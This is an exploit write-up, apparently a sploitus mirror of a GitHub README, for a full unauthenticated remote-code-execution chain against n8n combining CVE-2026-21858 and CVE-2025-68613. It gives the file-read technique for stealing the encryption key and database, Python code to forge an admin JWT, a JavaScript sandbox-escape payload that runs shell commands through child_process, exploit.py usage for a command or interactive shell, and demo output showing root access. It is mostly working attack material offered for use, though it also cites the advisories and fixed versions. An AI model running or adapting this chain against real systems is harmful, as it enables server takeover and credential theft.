Share
## https://sploitus.com/exploit?id=DED883F5-2EC9-52D3-A8BD-77686FDCA027
# CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain
**Unauthenticated LFI โ Admin Token Forge โ Sandbox Bypass โ RCE**
| | |
|---|---|
| **CVE** | CVE-2026-21858 (LFI) + CVE-2025-68613 (RCE) |
| **CVSS** | 10.0 + 9.9 (Critical) |
| **Affected** | n8n < 1.121.0 (LFI) / n8n 0.211.0 - 1.120.3 (RCE) |
| **Fixed** | 1.121.0 / 1.120.4+ |
| **Codename** | Ni8mare |
| **Credit** | Dor Attias (Cyera) |
| **Exploit** | [Chocapikk](https://github.com/Chocapikk/CVE-2026-21858) |
## TL;DR
Full unauthenticated RCE chain on n8n:
1. **CVE-2026-21858** - Content-Type confusion โ LFI
2. Read config + database โ forge admin JWT
3. **CVE-2025-68613** - Expression injection โ sandbox bypass โ RCE
## Attack Chain
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ UNAUTHENTICATED โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 1. LFI /proc/self/environ โ Find HOME directory โ
โ 2. LFI $HOME/.n8n/config โ Get encryptionKey โ
โ 3. LFI $HOME/.n8n/database.sqlite โ Get admin credentials โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ TOKEN FORGE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 4. Derive JWT secret from encryptionKey โ
โ 5. Forge admin session cookie โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ AUTHENTICATED RCE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 6. Create workflow with expression injection โ
โ 7. Sandbox bypass via this.process.mainModule.require โ
โ 8. Execute arbitrary commands as root โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
## CVE-2026-21858 - LFI via Content-Type Confusion
### The Patch
```
commit c8d604d2c466dd84ec24f4f092183d86e43f2518
Author: mfsiega
Date: Thu Nov 13 11:51:40 2025 +0100
Merge commit from fork
```
The legendary **"Merge commit from fork"** - when you see this, someone found something spicy. ๐ถ๏ธ
### Root Cause
```javascript
// BEFORE (vulnerable)
const files = (context.getBodyData().files as IDataObject) ?? {};
await context.nodeHelpers.copyBinaryFile(file.filepath, ...)
// AFTER (fixed)
a.ok(req.contentType === 'multipart/form-data', 'Expected multipart/form-data');
```
Send `Content-Type: application/json` โ control `filepath` โ read any file.
## CVE-2025-68613 - Expression Injection RCE
### The Payload
```javascript
={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}
```
n8n expressions have access to `this.process.mainModule.require` โ full sandbox escape.
### Token Forge
```python
# JWT secret derivation
jwt_secret = sha256(encryption_key[::2]).hexdigest()
# JWT hash
jwt_hash = b64encode(sha256(f"{email}:{password_hash}")).decode()[:10]
# Forge token
token = jwt.encode({"id": user_id, "hash": jwt_hash}, jwt_secret, "HS256")
```
## Lab Setup
```bash
docker compose up -d
# Wait ~60 seconds for setup
# Form: http://localhost:5678/form/vulnerable-form
# Creds: admin@exploit.local / password
```
## Usage
```bash
# Simple LFI
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --lfi /etc/passwd
# Full chain with command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
# Interactive shell
uv run python exploit.py http://localhost:5678 /form/vulnerable-form
```
## Demo
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain โ
โ LFI โ Token Forge โ Sandbox Bypass โ RCE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target: http://localhost:5678/form/vulnerable-form
[*] Version: 1.65.0 (VULN)
[x] HOME directory
[+] HOME directory: /root
[x] Encryption key
[+] Encryption key: yusrXZV1...
[x] Database
[+] Database: 1327104 bytes
[x] Admin user
[+] Admin user: admin@exploit.local
[x] Token forge
[+] Token forge: OK
[x] Admin access
[+] Admin access: GRANTED!
[+] Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjljMWI5MzU0LTI5NzQtNGZlOS05OTc2LWVmZDM3ZWEyNWFlMiIsImhhc2giOiJGYzVQZjVkUDRxIn0.TrIjHV3_6pw6Syi4qme5larZeQElBJmo4Y_eSgL9_M0
[x] RCE
[+] RCE: OK
uid=0(root) gid=0(root) groups=0(root)
```
## References
- [GHSA-v4pr-fm98-w9pg](https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg) - CVE-2026-21858
- [GHSA-v98v-ff95-f3cp](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp) - CVE-2025-68613
- [Nuclei Template CVE-2025-68613](https://github.com/MuhamadJuwandi/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68613.yaml)
- [Cyera Research - Ni8mare](https://thehackernews.com/2026/01/critical-n8n-vulnerability-cvss-100.html)